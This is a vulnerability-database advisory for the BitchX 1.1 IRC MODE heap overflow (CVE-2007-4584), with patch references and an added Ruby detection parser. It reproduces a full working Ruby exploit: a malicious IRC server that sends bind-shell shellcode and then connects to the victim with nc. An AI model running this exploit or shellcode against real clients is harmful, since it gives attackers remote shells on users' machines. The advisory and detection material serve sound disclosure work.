BitchX IRC MODE Message Remote Heap Overflow Vulnerability

Vulnerability ID 1113527 Vulnerability type Buffer overflow
Published 2007-08-27 Updated 2009-04-27
CVE ID CVE-2007-4584 CNNVD ID CNNVD-200708-467
Platform Linux CVSS score 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/4321
https://www.securityfocus.com/bid/25462
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-467
|Vulnerability details
BitchX is a popular IRC chat client. BitchX 1.1 contains a heap-based buffer overflow in its handling of malformed IRC MODE messages (the p_mode routine, per the exploit notes and the X-Force entry in the references below); a remote attacker can exploit it to take control of the client system. The bug is triggered from the server side: if a user is tricked into connecting to a malicious or compromised IRC server, and that server sends the client a MODE message carrying an over-long parameter, the overflow occurs and can lead to arbitrary code execution with the privileges of the user running BitchX. The exploit below sends MODE lines of roughly 2 KB, far beyond the 512-byte line limit of RFC 1459, so an over-long MODE line from a server is itself a usable detection signal. Fixed packages are listed in the Slackware (SSA:2009-116-02) and Gentoo (GLSA-200807-12) advisories referenced below.
|Exploit
#!/usr/bin/env ruby
# encoding: ASCII-8BIT
# (magic comment so the "\x.." shellcode literals and pack() output concatenate as
#  raw bytes on Ruby 1.9+, as they did on the Ruby 1.8 this was written for)
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actual vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################

require 'socket'

#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }

shellcode = #fork before binding a shell provides a clean exit
            "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+

             #metasploit linux x86 shellcode bind tcp port 4444
            "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
            "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
            "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
            "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
            "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
            "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
            "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
           

port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)

ret = (targets['linux 2.6 Hardened (FC6)'].hex)

puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit                                -"
puts "----------------------------------------------"


puts "\n[-] listening for incoming clients..."

while (client = sock.accept)
   ip = client.peeraddr

   buffer = client.gets
   puts "[<] #{buffer}"
  
   hostname = ([ret].pack('V')) * 13
   nick = "bannedit"

   #Fake server reply to connection
   buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
            ":0 001 #{nick} :biznitch-1.0\r\n"+
            ":5 002 #{nick} :biznitch-1.0\r\n"+
            ":6 003 #{nick} :a\r\n"+
            ":aaa 004 #{nick} :a\r\n"+
            ":aaa 005 #{nick} :a\r\n"+
            ":aaa 251 #{nick} :a\r\n"+
            ":aaa 252 #{nick} :a\r\n"+
            ":aaa 253 #{nick} :a\r\n"+
            ":aaa 254 #{nick} :a\r\n"+
            ":aaa 255 #{nick} :a\r\n"+
            ":aaa 375 #{nick} :a\r\n"+
            ":aaa 372 #{nick} :a\r\n"+
            ":aaa 376 #{nick} :a\r\n"
           
   join =   ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+      
            ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"

   puts "[>] sending fake server response"
   client.send(buffer, 0)
   sleep(2)
#   client.send(join, 0)

   topic =  ":aaa TOPIC #hackers:"
   ret = ret + 0x200
   topic<<  ([ret].pack('V')) * 100
   topic<< "\r\n"
   for i in 0..20
   client.send(topic, 0)
   end

   puts "[>] sending evil buffer"
   evilbuf = ":#{hostname}  MODE "
   evilbuf<< "#{nick} :aaa"
   ret = ret + 0x200
   evilbuf<< ([ret].pack('V')) * 200
   evilbuf<< "\x90" * (1126 - shellcode.length)
   evilbuf<< shellcode
   evilbuf<< "\x90" * 40
   evilbuf<< "\r\n"
  
   for i in 0..5
      client.send(evilbuf, 0)
   end

   sleep(10) #wait for the shellcode to do its thing...

   puts "[+] exploit completed if successful port 4444 should be open"
   puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"

   fork {
           system("nc #{ip[3]} 4444")
           puts "[+] exiting shell dropping back to listener"
        }
end

# milw0rm.com [2007-08-27]
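The trigger line the exploit builds (`evilbuf`) is malformed on several counts at once: a binary prefix, a total length of about 2 KB against RFC 1459's 512-byte limit, and a trailing MODE parameter of well over a thousand bytes. The following is an added example, not part of this advisory or of bannedit's exploit: a small Ruby IRC line parser plus a check that a client-side proxy or IDS rule could apply to flag that shape. The 512-byte limit is RFC 1459's; the 128-byte MODE parameter threshold and the two sample lines are constructed for this example and are not BitchX constants.

```ruby
# Added example: parse RFC 1459 lines and flag MODE messages shaped like the
# exploit's trigger. Not code from the advisory or from bannedit's exploit.

IRC_MAX_LINE = 512    # RFC 1459 limit, including the trailing CRLF
MAX_MODE_PARAM = 128  # constructed threshold for this example, not a BitchX value

# Parse one IRC line into { prefix:, command:, params: }.
# Returns nil when the line does not look like an IRC message.
def parse_irc_line(line)
  line = line.b.chomp("\r\n").chomp("\n")
  prefix = nil
  if line.start_with?(":")
    sp = line.index(" ")
    return nil if sp.nil?
    prefix = line[1...sp]
    line = line[(sp + 1)..-1].lstrip
  end
  # The trailing parameter begins at the first " :" and may contain spaces.
  trailing = nil
  if (t = line.index(" :"))
    trailing = line[(t + 2)..-1]
    line = line[0...t]
  end
  parts = line.split(" ")
  return nil if parts.empty?
  command = parts.shift.upcase
  params = parts
  params << trailing unless trailing.nil?
  { prefix: prefix, command: command, params: params }
end

# Return the reasons a line is suspicious; an empty array means it passes.
def check_irc_line(line)
  raw = line.b
  reasons = []
  reasons << "line is #{raw.bytesize} bytes, over the #{IRC_MAX_LINE}-byte limit" if raw.bytesize > IRC_MAX_LINE
  msg = parse_irc_line(raw)
  return reasons << "unparseable line" if msg.nil?
  if msg[:command] == "MODE"
    msg[:params].each_with_index do |p, i|
      reasons << "MODE param #{i} is #{p.bytesize} bytes" if p.bytesize > MAX_MODE_PARAM
    end
  end
  # Anything outside printable ASCII (other than CR/LF) has no place in a MODE line.
  binary = raw.bytes.any? { |b| (b < 0x20 && b != 0x0d && b != 0x0a) || b > 0x7e }
  reasons << "non-printable bytes in message" if binary
  reasons
end

# Constructed samples: a normal server MODE reply, and a line built the way the
# exploit builds evilbuf (packed-address prefix, over-long trailing MODE parameter).
BENIGN  = ":bannedit MODE bannedit :+iw\r\n"
HOSTILE = ":" + ([0x8154d70].pack("V") * 13) + "  MODE bannedit :aaa" +
          ([0x8154f70].pack("V") * 200) + ("\x90" * 1100) + "\r\n"

if __FILE__ == $0
  [BENIGN, HOSTILE].each do |l|
    r = check_irc_line(l)
    puts(r.empty? ? "[ok]   #{l.bytesize}-byte line" : "[flag] #{r.join('; ')}")
  end
end
```

Because the check works on raw bytes before any client parsing, it is safe to run in front of an unpatched client; a line that trips more than one of these rules (over-long, over-long MODE parameter, binary content) is not something a legitimate IRC server sends.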
|Affected products
Slackware Linux -current
Gentoo Linux
BitchX IRC Client 1.1
|References

Source: MILW0RM
Name: 4321
Link: http://www.milw0rm.com/exploits/4321
Source: SLACKWARE
Name: SSA:2009-116-02
Link: http://slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.285737
Source: GENTOO
Name: GLSA-200807-12
Link: http://security.gentoo.org/glsa/glsa-200807-12.xml
Source: SECUNIA
Name: 34870
Link: http://secunia.com/advisories/34870
Source: SECUNIA
Name: 31180
Link: http://secunia.com/advisories/31180
Source: SECUNIA
Name: 26578
Link: http://secunia.com/advisories/26578
Source: OSVDB
Name: 37480
Link: http://osvdb.org/37480
Source: XF
Name: bitchx-pmode-bo(36306)
Link: http://xforce.iss.net/xforce/xfdb/36306
Source: BID
Name: 25462
Link: http://www.securityfocus.com/bid/25462
Source: VUPEN
Name: ADV-2007-2994
Link: http://www.frsirt.com/english/advisories/2007/2994